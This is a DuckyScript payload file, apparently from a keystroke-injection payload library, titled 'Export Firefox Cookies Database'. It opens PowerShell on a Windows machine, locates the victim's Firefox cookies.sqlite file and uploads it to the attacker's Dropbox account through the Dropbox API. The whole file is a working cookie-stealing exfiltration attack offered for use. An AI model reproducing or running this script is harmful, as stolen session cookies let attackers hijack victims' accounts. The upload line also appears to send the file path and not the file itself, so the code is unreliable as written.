Path: blob/master/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
2968 views
REM ####################################################1REM # |2REM # Title : Export Firefox Cookies Database |3REM # Author : Aleff |4REM # Version : 1.0 |5REM # Category : Exfiltration |6REM # Target : Windows 10-11 |7REM # |8REM ####################################################91011REM Requirements:12REM - Firefox must be installed131415REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.16DEFINE DROPBOX_ACCESS_TOKEN "example"171819DELAY 100020GUI r21DELAY 50022STRING powershell23DELAY 50024ENTER25DELAY 2000262728REM Get cookies DB path29STRINGLN30$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'31$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}3233$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'3435END_STRINGLN3637REM Setting about exfiltration38STRING $accessToken =39STRING DROPBOX_ACCESS_TOKEN40ENTER4142STRINGLN43$uploadUrl = "https://content.dropboxapi.com/2/files/upload"4445$dropboxFilePath = "/cookies_exported.sqlite"4647$headers = @{}48$headers.Add("Authorization", "Bearer $accessToken")49$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')50$headers.Add("Content-Type", "application/octet-stream")5152Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit;53END_STRINGLN545556